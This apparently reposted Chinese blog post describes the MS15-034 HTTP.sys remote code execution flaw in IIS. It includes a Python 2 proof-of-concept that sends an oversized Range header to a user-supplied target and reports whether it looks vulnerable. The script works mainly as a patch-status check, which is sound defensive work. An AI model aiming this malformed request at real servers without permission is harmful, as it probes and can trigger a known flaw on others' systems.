zoukankan      html  css  js  c++  java

  • HTTP.sys远程执行代码漏洞

    远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。

    官方文档:https://technet.microsoft.com/zh-cn/library/security/MS15-034

    POC(python2):

     1 #!/usr/bin/env python
 2 #-*-coding:utf-8-*-
 3 
 4 import socket
 5 import random
 6 
 7 ipAddr = raw_input("Please set your target:")
 8 hexAllFfff = "18446744073709551615"
 9 req1 = "GET / HTTP/1.0

"
10 req = "GET /  HTTP/1.1
Host: stuff
Range: bytes=0-" + hexAllFfff + "

"
11 
12 print "[*] Audit Started"
13 
14 try:
15                 client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
16                 client_socket.connect((ipAddr, 80))
17                 client_socket.send(req1)
18                 boringResp = client_socket.recv(1024)
19                 if "Microsoft" not in boringResp:
20                                 print "[*] Not IIS"
21                                 exit(0)
22                 client_socket.close()
23                 client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
24                 client_socket.connect((ipAddr, 80))
25                 client_socket.send(req)
26                 goodResp = client_socket.recv(1024)
27                 if "Requested Range Not Satisfiable" in goodResp:
28                                 print "[!!] Looks VULN"
29                 elif " The request has an invalid header name" in goodResp:
30                                 print "[*] Looks Patched"
31                 else:
32                                 print "[*] Unexpected response, cannot discern patch status"
33                                 
34 except Exception,e:
35                 print e
  • 相关阅读:
    访友
    幼儿园分班
    求一个数的平方根
    计数器
    连续数组的最大和
    给定一个权重数组,实现一个带权重的路由策略
    两个超长字符串相加
    参数解析(得到输入参数)
    对字符串中的所有单词进行倒排。
    推荐PHP程序员进阶的好书
  • 原文地址:https://www.cnblogs.com/panisme/p/9222385.html
Copyright © 2011-2022 走看看